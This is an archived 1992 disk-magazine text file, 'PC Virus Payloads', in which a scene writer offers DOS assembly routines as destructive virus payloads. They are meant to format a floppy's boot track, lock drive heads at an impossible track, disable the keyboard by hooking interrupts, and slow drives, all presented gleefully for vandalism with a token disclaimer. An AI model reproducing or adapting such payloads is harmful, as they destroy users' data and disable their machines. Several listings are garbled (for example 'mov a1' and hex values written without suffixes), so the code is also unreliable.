home *** CD-ROM | disk | FTP | other *** search
/ Satanic Rites 1 / Satanic Rites - Issue 1 (1992-05-17)(Destiny).adf / T / PC_Virus < prev    next >
Text File  |  2021-10-01  |  3KB  |  148 lines

  1. {6*************************************
  2. *                                   *
  3. *         {3PC Virus Payloads.{6        *
  4. *  {1A text by Terminator of Destiny.{6 *
  5. *                                   *
  6. *  {2 Note - Dont give this file to {6  *
  7. *   {2 lamers for Obvious reasons.  {6  *
  8. *                                   *
  9. *************************************
  10.  
  11. {5Before I even get started please note
  12. that in {2most countries {5it is now
  13. }3illegal {5to write virus type programs.
  14. {6I do not accept responsiblity for any
  15. shit you get into ok ?
  16.  
  17. {5Most of the information in this file
  18. comes from the {1excellent {5book {6`Computer
  19. Viruses - A high tech disease.'  {3By
  20. Ralf Burger{5.  Get it it's a kewl book &
  21. contains lots of source for writing a
  22. Virus, In various languages from
  23. Assembly to Pascal to {6BASIC !
  24.  
  25. {3Here are some of the best routines ...
  26.  
  27. {1Ok,they say a virus can not in any way
  28. harm any hardware.  }1^BULLSHIT!^  the
  29. following {7Assembly {1routine causes the
  30. drive heads to move to an impossible
  31. possistion.  }7Locking them!  {5They can
  32. only be freed by opening up the {4PC {5and
  33. physically moving them back to their
  34. normal posistions!  {2HEHEHE!
  35.  
  36. {6** {7NOTE {6** {4Some PC Drive manufacturers
  37. however are aware of the Stupidity of
  38. the BIOS Calls and have installed
  39. hardware protection against this sort
  40. of thing happening.
  41.  
  42. {7DESTROY DRIVE {3:- )
  43.  
  44. {7
  45.         mov ah,05
  46.         mov dl,00
  47.  ; Drive number!  0=a 1=b 2=c 3=d e.t.c.
  48.         mov dh,00
  49.         mov ch,80
  50. ; <--- Track number!!!! Impossible!!!
  51.         mov cl,01
  52.         mov a1,08
  53.         int 13
  54.         mov ah,00
  55.         int 21
  56.  
  57. {2Hehehe! {3Good eh ?
  58.  
  59. {6Now how about destroying the disk
  60. itself ?
  61. {7
  62.         mov ah,05
  63.         mov dl,00
  64.         mov dh,00
  65.         mov ch,00
  66.         mov cl,01
  67.         mov al,08
  68.         int 13
  69.         mov ah,00
  70.         int 21
  71.         mov ah,05 {5; Format
  72. {7        mov dl,00 {5; A:
  73. {7        mov dh,00 {5; Head 0
  74. {7        mov ch,00 {5; Track 0
  75. {7        mov cl,01 {5; Sector 1
  76. {7        mov al,08 {5; 8 sectors/1 track
  77. {7        int 13    {5; Do it!
  78.  
  79. {4heheh! {3bye bye boot track!
  80.  
  81. {5 Now how about {1locking up the keyboard{5
  82. so the user can't reboot or {1CTRL-BREAK{5
  83. etc.  ?  }1Easy peasy ....!
  84. {7
  85.  
  86.         mov ah,35
  87.         mov al,04
  88.         int 21
  89.  
  90.         mov ax,es
  91.         mov dx,bx
  92.         mov ds,ax
  93.         mov ah,25
  94.         mov al,09
  95.         int 21
  96.         mov ax,0000
  97.         int 21
  98.         mov ah,35
  99.         mov al,04
  100.         int 21
  101.  
  102. {5;* Redirect keyboard to vector 4
  103. ;* vector 4 points to an IRET
  104. {7
  105.         mov ax,es
  106.         mov dx,bx
  107.         mov ds,ax
  108.         mov ah,25
  109.         mov al,09
  110.         int 21
  111.  
  112.         mov ax,0000
  113.         int 21
  114.  
  115. {2!!!
  116.  
  117. {4Slow down the drives ? }4Okay ....
  118. {7
  119.         Mov ax,0000
  120.         mov ds,ax
  121.         mov bx,0522
  122.         mov ah,ff    {5 ; Drive rate
  123. {7        mov [BX],ah
  124.         xor ax,ax
  125.         int 13
  126.         mov ah,00
  127.         int 21
  128.  
  129. {7That's all for now folks.  For more,
  130. get the book mentioned above.  It's
  131. one fucking good read!
  132.  
  133.               {2Termin8r!
  134.  
  135. {1(Well there you are then. PC Vandalism
  136. explained. ^DESTINY^ cannot be held
  137. responsible for any trouble you get
  138. into - this information has been
  139. provided for informational purposes
  140. only. Think twice before formatiing
  141. the `{3Woolworths{1' hard drive -Ed)
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148.